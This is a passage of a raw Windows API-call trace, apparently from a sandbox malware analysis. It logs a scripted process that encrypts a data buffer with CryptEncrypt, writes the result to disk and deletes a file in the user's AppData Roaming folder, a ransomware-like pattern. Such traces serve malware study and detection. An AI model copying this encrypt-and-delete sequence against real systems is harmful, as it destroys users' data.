PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] CharLowerBuffW (in: lpsz="byte[31656]", cchLength=0xb | out: lpsz="byte[31656]") returned 0xb [0122.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.662] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.663] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa360, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.663] CryptEncrypt (in: hKey=0x9a4900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2abeb70*, pdwDataLen=0x8cef60*=0x7ba2, dwBufLen=0x7ba8 | out: pbData=0x2abeb70*, pdwDataLen=0x8cef60*=0x7ba8) returned 1 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.664] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.664] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.664] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.664] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.664] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.664] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.665] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.665] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.665] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.665] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.665] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.665] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.665] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.667] WriteFile (in: hFile=0x4f0, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0x7ba8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0x7ba8, lpOverlapped=0x0) returned 1 [0122.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.669] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.669] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.669] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.669] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.669] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.669] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.669] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa318, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.669] CryptDestroyKey (hKey=0x9a4900) returned 1 [0122.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.670] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.670] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.670] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.670] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.670] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.671] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.671] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.671] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.671] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.671] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.671] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.688] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.690] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.690] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.691] CryptReleaseContext (hProv=0x9bf550, dwFlags=0x0) returned 1 [0122.691] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.691] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.691] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.691] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.691] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.691] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.691] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.691] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.691] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.691] CloseHandle (hObject=0x4f4) returned 1 [0122.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.692] CloseHandle (hObject=0x4f0) returned 1 [0122.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.694] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.694] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.695] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/fM4.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv", lpFilePart=0x8cedf4*="fM4.mkv") returned 0x27 [0122.695] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fm4.mkv")) returned 0x20 [0122.695] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cce37f0, ftCreationTime.dwHighDateTime=0x1d5cb43, ftLastAccessTime.dwLowDateTime=0x503c5ad0, ftLastAccessTime.dwHighDateTime=0x1d5d235, ftLastWriteTime.dwLowDateTime=0x503c5ad0, ftLastWriteTime.dwHighDateTime=0x1d5d235, nFileSizeHigh=0x0, nFileSizeLow=0x7ba2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="fM4.mkv", cAlternateFileName="")) returned 0x9a4a40 [0122.695] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fM4.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fm4.mkv")) returned 1 [0122.701] FindNextFileW (in: hFindFile=0x9a4a40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cce37f0, ftCreationTime.dwHighDateTime=0x1d5cb43, ftLastAccessTime.dwLowDateTime=0x503c5ad0, ftLastAccessTime.dwHighDateTime=0x1d5d235, ftLastWriteTime.dwLowDateTime=0x503c5ad0, ftLastWriteTime.dwHighDateTime=0x1d5d235, nFileSizeHigh=0x0, nFileSizeLow=0x7ba2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="fM4.mkv", cAlternateFileName="")) returned 0 [0122.701] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0122.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.701] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0122.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0122.702] RtlAllocateHeap 